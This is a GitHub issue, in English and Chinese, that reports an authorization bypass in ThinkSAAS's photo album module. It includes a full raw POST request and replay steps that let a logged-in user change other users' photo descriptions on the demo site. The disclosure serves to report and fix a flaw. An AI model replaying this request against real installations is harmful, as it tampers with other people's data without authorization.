Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Thinksns Overrides the Right to Modify the Photo Description of Albums
POST Packet: POST /index.php?app=photo&ac=album&ts=info_do HTTP/1.1 Host: demo.thinksaas.cn Connection: close Content-Length: 42 Cache-Control: max-age=0 Origin: https://demo.thinksaas.cn Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 Accept: text�cml,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8 Referer: https://demo.thinksaas.cn/index.php?app=photo&ac=album&ts=info&albumid=85&addtime=1552909150 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: Your landing cookie
photoid%5B%5D=101&photodesc%5B%5D=test
Get parameters: Log in to demo on the official website, select an album: https://demo.thinksaas.cn/photo/, enter an album: https://demo.thinksaas.cn/photo/album/84/, click on an image: https://demo.thinksaas.cn/photo/show/103/, photoid%5B%5D parameter is show parameter, and then replay the data package to change the description of other people's picture to photodesc%5B%5D parameter.
/////////////////////////////////////////////////////////////////////
thinksns越权修改相册图片描述
POST数据包: POST /index.php?app=photo&ac=album&ts=info_do HTTP/1.1 Host: demo.thinksaas.cn Connection: close Content-Length: 42 Cache-Control: max-age=0 Origin: https://demo.thinksaas.cn Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 Accept: text�cml,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8 Referer: https://demo.thinksaas.cn/index.php?app=photo&ac=album&ts=info&albumid=85&addtime=1552909150 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: 你的登陆cookie
获取参数:在官网demo登陆,选择一个相册:https://demo.thinksaas.cn/photo/,进入一个相册:https://demo.thinksaas.cn/photo/album/84/,在点击一个图片:https://demo.thinksaas.cn/photo/show/103/,photoid%5B%5D参数为show参数后数字,重放数据包即可将别人的图片描述改为photodesc%5B%5D参数的test
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Thinksns Overrides the Right to Modify the Photo Description of Albums
POST Packet:
POST /index.php?app=photo&ac=album&ts=info_do HTTP/1.1
Host: demo.thinksaas.cn
Connection: close
Content-Length: 42
Cache-Control: max-age=0
Origin: https://demo.thinksaas.cn
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Accept: text�cml,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Referer: https://demo.thinksaas.cn/index.php?app=photo&ac=album&ts=info&albumid=85&addtime=1552909150
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Your landing cookie
photoid%5B%5D=101&photodesc%5B%5D=test
Get parameters: Log in to demo on the official website, select an album: https://demo.thinksaas.cn/photo/, enter an album: https://demo.thinksaas.cn/photo/album/84/, click on an image: https://demo.thinksaas.cn/photo/show/103/, photoid%5B%5D parameter is show parameter, and then replay the data package to change the description of other people's picture to photodesc%5B%5D parameter.
/////////////////////////////////////////////////////////////////////
thinksns越权修改相册图片描述
POST数据包:
POST /index.php?app=photo&ac=album&ts=info_do HTTP/1.1
Host: demo.thinksaas.cn
Connection: close
Content-Length: 42
Cache-Control: max-age=0
Origin: https://demo.thinksaas.cn
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Accept: text�cml,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Referer: https://demo.thinksaas.cn/index.php?app=photo&ac=album&ts=info&albumid=85&addtime=1552909150
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: 你的登陆cookie
photoid%5B%5D=101&photodesc%5B%5D=test
获取参数:在官网demo登陆,选择一个相册:https://demo.thinksaas.cn/photo/,进入一个相册:https://demo.thinksaas.cn/photo/album/84/,在点击一个图片:https://demo.thinksaas.cn/photo/show/103/,photoid%5B%5D参数为show参数后数字,重放数据包即可将别人的图片描述改为photodesc%5B%5D参数的test
The text was updated successfully, but these errors were encountered: